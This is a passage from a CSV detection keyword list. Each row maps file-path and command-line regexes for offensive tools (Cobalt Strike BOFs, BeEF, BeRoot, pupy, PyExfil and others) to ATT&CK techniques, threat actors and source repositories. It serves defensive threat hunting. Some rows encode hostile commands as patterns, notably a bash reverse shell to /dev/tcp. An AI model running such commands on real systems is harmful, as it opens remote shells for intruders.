- T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/realoriginal/beacon-object-file","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*/BeaconTool.java*",".{0,1000}\/BeaconTool\.java.{0,1000}","offensive_tool_keyword","cobaltstrike","Practice Go programming and implement CobaltStrike's Beacon in Go","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/darkr4y/geacon","1","1","N/A","10","10","1107","204","2020-10-02T10:34:37Z","2020-02-14T14:01:29Z" "*/beef.git*",".{0,1000}\/beef\.git.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","9387","2058","2024-05-01T20:01:18Z","2011-11-23T06:53:25Z" "*/beef/extensions/*.rb*",".{0,1000}\/beef\/extensions\/.{0,1000}\.rb.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","9387","2058","2024-05-01T20:01:18Z","2011-11-23T06:53:25Z" "*/beef_bind_shell/*",".{0,1000}\/beef_bind_shell\/.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","9387","2058","2024-05-01T20:01:18Z","2011-11-23T06:53:25Z" "*/beef_common.js*",".{0,1000}\/beef_common\.js.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","9387","2058","2024-05-01T20:01:18Z","2011-11-23T06:53:25Z" "*/beefbind/*",".{0,1000}\/beefbind\/.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","9387","2058","2024-05-01T20:01:18Z","2011-11-23T06:53:25Z" "*/beefproject/*",".{0,1000}\/beefproject\/.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","9387","2058","2024-05-01T20:01:18Z","2011-11-23T06:53:25Z" "*/Ben0xA/*",".{0,1000}\/Ben0xA\/.{0,1000}","offensive_tool_keyword","Github Username","Github username of known powershell offensive modules and scripts","T1059 - T1027 - T1064 - T1086 - T1191 - T1202","TA0002 - TA0003 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Ben0xA","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/beRoot.exe*",".{0,1000}\/beRoot\.exe.{0,1000}","offensive_tool_keyword","BeRoot","Privilege Escalation Project - Windows / Linux / Mac ","T1068 - T1055 - T1078 - T1548 - T1003","TA0004","N/A","N/A","Privilege Escalation","https://github.com/AlessandroZ/BeRoot","1","1","N/A","10","10","2363","465","2022-02-08T10:30:38Z","2017-04-14T12:47:31Z" "*/BeRoot.git*",".{0,1000}\/BeRoot\.git.{0,1000}","offensive_tool_keyword","BeRoot","Privilege Escalation Project - Windows / Linux / Mac ","T1053.005 - T1069.002 - T1069.001 - T1053.003 - T1087.001 - T1087.002 - T1082 - T1135 - T1049 - T1007","TA0004","N/A","N/A","Privilege Escalation","https://github.com/AlessandroZ/BeRoot","1","1","N/A","10","10","2363","465","2022-02-08T10:30:38Z","2017-04-14T12:47:31Z" "*/beRoot.py*",".{0,1000}\/beRoot\.py.{0,1000}","offensive_tool_keyword","BeRoot","Privilege Escalation Project - Windows / Linux / Mac ","T1053.005 - T1069.002 - T1069.001 - T1053.003 - T1087.001 - T1087.002 - T1082 - T1135 - T1049 - T1007","TA0004","N/A","N/A","Privilege Escalation","https://github.com/AlessandroZ/BeRoot","1","1","N/A","10","10","2363","465","2022-02-08T10:30:38Z","2017-04-14T12:47:31Z" "*/beroot.py*",".{0,1000}\/beroot\.py.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*/beRoot.zip*",".{0,1000}\/beRoot\.zip.{0,1000}","offensive_tool_keyword","BeRoot","Privilege Escalation Project - Windows / Linux / Mac ","T1068 - T1055 - T1078 - T1548 - T1003","TA0004","N/A","N/A","Privilege Escalation","https://github.com/AlessandroZ/BeRoot","1","0","N/A","10","10","2363","465","2022-02-08T10:30:38Z","2017-04-14T12:47:31Z" "*/BeRoot/Linux/*",".{0,1000}\/BeRoot\/Linux\/.{0,1000}","offensive_tool_keyword","BeRoot","BeRoot Project is a post exploitation tool to check common misconfigurations to find a way to escalate our privilege.","T1068 - T1055 - T1078 - T1548 - T1003","TA0004","N/A","N/A","Exploitation tools","https://github.com/AlessandroZ/BeRoot","1","0","N/A","10","10","2363","465","2022-02-08T10:30:38Z","2017-04-14T12:47:31Z" "*/beroot/modules/*.py*",".{0,1000}\/beroot\/modules\/.{0,1000}\.py.{0,1000}","offensive_tool_keyword","BeRoot","BeRoot Project is a post exploitation tool to check common misconfigurations to find a way to escalate our privilege.","T1068 - T1055 - T1078 - T1548 - T1003","TA0004","N/A","N/A","Exploitation tools","https://github.com/AlessandroZ/BeRoot","1","1","N/A","10","10","2363","465","2022-02-08T10:30:38Z","2017-04-14T12:47:31Z" "*/BesoToken.cpp*",".{0,1000}\/BesoToken\.cpp.{0,1000}","offensive_tool_keyword","BesoToken","A tool to Impersonate logged on users without touching LSASS (Including non-Interactive sessions).","T1134 - T1003.002","TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/OmriBaso/BesoToken","1","1","N/A","10","1","93","13","2022-11-23T10:45:07Z","2022-11-21T01:07:51Z" "*/BesoToken.exe*",".{0,1000}\/BesoToken\.exe.{0,1000}","offensive_tool_keyword","BesoToken","A tool to Impersonate logged on users without touching LSASS (Including non-Interactive sessions).","T1134 - T1003.002","TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/OmriBaso/BesoToken","1","1","N/A","10","1","93","13","2022-11-23T10:45:07Z","2022-11-21T01:07:51Z" "*/BesoToken.git*",".{0,1000}\/BesoToken\.git.{0,1000}","offensive_tool_keyword","BesoToken","A tool to Impersonate logged on users without touching LSASS (Including non-Interactive sessions).","T1134 - T1003.002","TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/OmriBaso/BesoToken","1","1","N/A","10","1","93","13","2022-11-23T10:45:07Z","2022-11-21T01:07:51Z" "*/bettercap*",".{0,1000}\/bettercap.{0,1000}","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","15702","1412","2024-04-08T07:48:24Z","2018-01-07T15:30:41Z" "*/BetterSafetyKatz.exe*",".{0,1000}\/BetterSafetyKatz\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/bgp_exfil.py*",".{0,1000}\/bgp_exfil\.py.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","","","Data Exfiltration","https://github.com/ytisf/PyExfil","1","1","N/A","10","8","738","138","2023-02-17T03:12:36Z","2014-11-27T19:06:24Z" "*/bh_owned.py*",".{0,1000}\/bh_owned\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*/bhqc.py -*",".{0,1000}\/bhqc\.py\s\-.{0,1000}","offensive_tool_keyword","bloodhound-quickwin","Simple script to extract useful informations from the combo BloodHound + Neo4j","T1087 - T1087.001 - T1018 - T1069 - T1069.002","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/kaluche/bloodhound-quickwin","1","0","AD Enumeration","6","2","185","19","2023-12-18T13:23:10Z","2021-02-16T16:04:16Z" "*/BIFFRecordEncryption.cs*",".{0,1000}\/BIFFRecordEncryption\.cs.{0,1000}","offensive_tool_keyword","Macrome","An Excel Macro Document Reader/Writer for Red Teamers & Analysts. Blog posts describing what this tool actually does can be found https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/ and https://malware.pizza/2020/06/19/further-evasion-in-the-forgotten-corners-of-ms-xls/","T1140","TA0005","N/A","N/A","Exploitation tools","https://github.com/michaelweber/Macrome","1","1","N/A","N/A","6","519","77","2022-02-01T16:26:13Z","2020-05-07T22:44:11Z" "*/big_shell_pwd.7z*",".{0,1000}\/big_shell_pwd\.7z.{0,1000}","offensive_tool_keyword","cheetah","a very fast brute force webshell password tool","T1110 - T1190 - T1505.003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/shmilylty/cheetah","1","1","N/A","10","7","618","153","2023-04-17T01:33:52Z","2017-04-15T20:03:50Z" "*/bin/0d1n*",".{0,1000}\/bin\/0d1n.{0,1000}","offensive_tool_keyword","0d1n","Tool for automating customized attacks against web applications. Fully made in C language with pthreads it has fast performance.","T1583 - T1584 - T1190 - T1133","TA0002 - TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/CoolerVoid/0d1n","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/bin/AceLdr*",".{0,1000}\/bin\/AceLdr.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike UDRL for memory scanner evasion.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/kyleavery/AceLdr","1","1","N/A","10","10","808","151","2023-09-28T19:47:03Z","2022-08-11T00:06:09Z" "*/bin/bash -c ""php -q -S 0.0.0.0:80 &"" > /dev/null 2>&1*",".{0,1000}\/bin\/bash\s\-c\s\""php\s\-q\s\-S\s0\.0\.0\.0\:80\s\&\""\s\>\s\/dev\/null\s2\>\&1.{0,1000}","offensive_tool_keyword","EvilnoVNC","EvilnoVNC is a Ready to go Phishing Platform","T1566 - T1110 - T1555 - T1204 - T1592","TA0001 - TA0006 - TA0009","N/A","N/A","Phishing","https://github.com/JoelGMSec/EvilnoVNC","1","0","N/A","9","8","717","126","2024-03-21T10:05:50Z","2022-09-04T10:48:49Z" "*/bin/bash -c 'bash -i >& /dev/tcp/*/* 0>&1'*",".{0,1000}\/bin\/bash\s\-c\s\'bash\s\-i\s\>\&\s\/dev\/tcp\/.{0,1000}\/.{0,1000}\s0\>\&1\'.{0,1000}","offensive_tool_keyword","rustcat","Rustcat(rcat) - The modern Port listener and Reverse shell","T1090.001 - T1090.002 - T1046","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/robiot/rustcat","1","0","N/A","10","10","650","57","2024-04-22T10:43:11Z","2021-06-04T17:03:47Z" "*/bin/fake-sms*",".{0,1000}\/bin\/fake\-sms.{0,1000}","offensive_tool_keyword","fake-sms","A simple command line tool using which you can skip phone number based SMS verification by using a temporary phone number that acts like a proxy.","T1598.003 - T1514","TA0003 - TA0009","N/A","N/A","Defense Evasion","https://github.com/Narasimha1997/fake-sms","1","0","N/A","8","10","2663","176","2023-08-01T15:34:41Z","2021-02-18T15:18:50Z" "*/bin/gorsair *",".{0,1000}\/bin\/gorsair\s.{0,1000}","offensive_tool_keyword","Gorsair","Gorsair hacks its way into remote docker containers that expose their APIs","T1552","TA0006","N/A","N/A","Exploitation tools","https://github.com/Ullaakut/Gorsair","1","0","N/A","N/A","9","837","74","2023-12-19T18:44:32Z","2018-08-02T16:49:14Z" "*/bin/gs-netcat*",".{0,1000}\/bin\/gs\-netcat.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","9","10","1335","120","2024-04-22T15:20:00Z","2020-09-18T16:14:22Z" "*/bin/hakrawler*",".{0,1000}\/bin\/hakrawler.{0,1000}","offensive_tool_keyword","hakrawler","Simple fast web crawler designed for easy and quick discovery of endpoints and assets within a web application","T1190 - T1212 - T1087.001","TA0007 - TA0003 - TA0009","N/A","N/A","Web Attacks","https://github.com/hakluke/hakrawler","1","0","N/A","6","10","4236","474","2024-01-23T10:58:14Z","2019-12-15T13:54:43Z" "*/bin/kidlogger*",".{0,1000}\/bin\/kidlogger.{0,1000}","offensive_tool_keyword","kiglogger","malware parental control software - keylogger","T1056.001 - T1113 - T1056.004","TA0006 - TA0009","N/A","N/A","Collection","https://kidlogger.net/download.html","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*/bin/nxcdb*",".{0,1000}\/bin\/nxcdb.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*/bin/posh*",".{0,1000}\/bin\/posh.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*/bin/proxy_cli.py*",".{0,1000}\/bin\/proxy_cli\.py.{0,1000}","offensive_tool_keyword","sshimpanzee","SSHD Based implant supporting tunneling mecanisms to reach the C2 (DNS - ICMP - HTTP Encapsulation - HTTP/Socks Proxies - UDP","T1572 - T1095 - T1090 - T1043","TA0010 - TA0011 - TA0005","N/A","N/A","C2","https://github.com/lexfo/sshimpanzee","1","1","N/A","10","10","228","26","2024-01-29T14:20:03Z","2023-04-03T10:11:27Z" "*/bin/pspsy*",".{0,1000}\/bin\/pspsy.{0,1000}","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1082 - T1518.001","TA0007","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","0","N/A","8","10","4548","484","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z" "*/bin/pupysh*",".{0,1000}\/bin\/pupysh.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*/bin/read_i.php?a1=step2-down-b&a2=*",".{0,1000}\/bin\/read_i\.php\?a1\=step2\-down\-b\&a2\=.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","can be used for data exfiltration simulation","8","6","587","136","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*/bin/read_i.php?a1=step2-down-c&a2=*",".{0,1000}\/bin\/read_i\.php\?a1\=step2\-down\-c\&a2\=.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","can be used for data exfiltration simulation","8","6","587","136","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*/bin/read_i.php?a1=step2-down-j&a2=*",".{0,1000}\/bin\/read_i\.php\?a1\=step2\-down\-j\&a2\=.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","can be used for data exfiltration simulation","8","6","587","136","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*/bin/read_i.php?a1=step2-down-k&a2=*",".{0,1000}\/bin\/read_i\.php\?a1\=step2\-down\-k\&a2\=.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","can be used for data exfiltration simulation","8","6","587","136","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*/bin/read_i.php?a1=step2-down-r&a2=*",".{0,1000}\/bin\/read_i\.php\?a1\=step2\-down\-r\&a2\=.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","can be used for data exfiltration simulation","8","6","587","136","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*/bin/read_i.php?a1=step2-down-u&a2=*",".{0,1000}\/bin\/read_i\.php\?a1\=step2\-down\-u\&a2\=.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","can be used for data exfiltration simulation","8","6","587","136","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*/bin/Sleeper.o*",".{0,1000}\/bin\/Sleeper\.o.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files (BOF) for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/crypt0p3g/bof-collection","1","1","N/A","10","10","169","25","2022-12-05T04:49:33Z","2021-01-20T06:07:38Z" "*/bin/tor2web*",".{0,1000}\/bin\/tor2web.{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tor2web/Tor2web","1","0","N/A","9","7","684","175","2023-02-07T21:52:31Z","2011-12-17T15:14:02Z" "*/bin/torify*",".{0,1000}\/bin\/torify.{0,1000}","offensive_tool_keyword","tor","used for anonymous communication and web browsing. It is designed to protect users' privacy and freedom by preventing surveillance or traffic analysis. Abused by attacker for defense evasion, contacting C2 and data exfiltration","T1573.002 - T1090.003","TA0011 - TA0010 - TA0005","CostaRicto - Operation Wocao","APT28 - APT29 - Leviathan","C2","https://deb.torproject.org/torproject.org/","1","0","torify is a wrapper for torsocks or tsocks and tor","10","10","N/A","N/A","N/A","N/A" "*/bin/unshackle*",".{0,1000}\/bin\/unshackle.{0,1000}","offensive_tool_keyword","unshackle","Unshackle is an open-source tool to bypass Windows and Linux user passwords from a bootable USB based on Linux","T1110.004 - T1059.004 - T1070.004","TA0006 - TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Fadi002/unshackle","1","0","N/A","10","10","1686","100","2023-11-10T19:48:10Z","2023-07-19T22:30:28Z" "*/bin/wapiti*",".{0,1000}\/bin\/wapiti.{0,1000}","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","10","979","159","2024-05-01T19:11:32Z","2020-06-06T20:17:55Z" "*/bin2hex.lua*",".{0,1000}\/bin2hex\.lua.{0,1000}","offensive_tool_keyword","OffensiveLua","Offensive Lua is a collection of offensive security scripts written in Lua with FFI","T1059 - T1218.011 - T1105 - T1021.002 - T1564.001 - T1112 - T1113 - T1204.002 - T1547.002","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hackerhouse-opensource/OffensiveLua","1","1","N/A","8","2","164","26","2023-11-17T00:35:10Z","2023-10-25T17:21:13Z" "*/bind_powershell.rb*",".{0,1000}\/bind_powershell\.rb.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","9387","2058","2024-05-01T20:01:18Z","2011-11-23T06:53:25Z" "*/bindshell.lua*",".{0,1000}\/bindshell\.lua.{0,1000}","offensive_tool_keyword","OffensiveLua","Offensive Lua is a collection of offensive security scripts written in Lua with FFI","T1059 - T1218.011 - T1105 - T1021.002 - T1564.001 - T1112 - T1113 - T1204.002 - T1547.002","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hackerhouse-opensource/OffensiveLua","1","1","N/A","8","2","164","26","2023-11-17T00:35:10Z","2023-10-25T17:21:13Z" "*/bin-sploits/*.zip*",".{0,1000}\/bin\-sploits\/.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","N/A","10","10","5246","1068","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z" "*/BITB.git*",".{0,1000}\/BITB\.git.{0,1000}","offensive_tool_keyword","bitb","Browser templates for Browser In The Browser (BITB) attack","T1056.001 - T1134 - T1090","TA0005 - TA0006 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/mrd0x/BITB","1","1","N/A","10","10","2726","467","2024-01-26T05:20:18Z","2022-03-15T16:51:39Z" "*/BITB-main*",".{0,1000}\/BITB\-main.{0,1000}","offensive_tool_keyword","bitb","Browser templates for Browser In The Browser (BITB) attack","T1056.001 - T1134 - T1090","TA0005 - TA0006 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/mrd0x/BITB","1","0","N/A","10","10","2726","467","2024-01-26T05:20:18Z","2022-03-15T16:51:39Z" "*/bitcoin-getaddr.nse*",".{0,1000}\/bitcoin\-getaddr\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 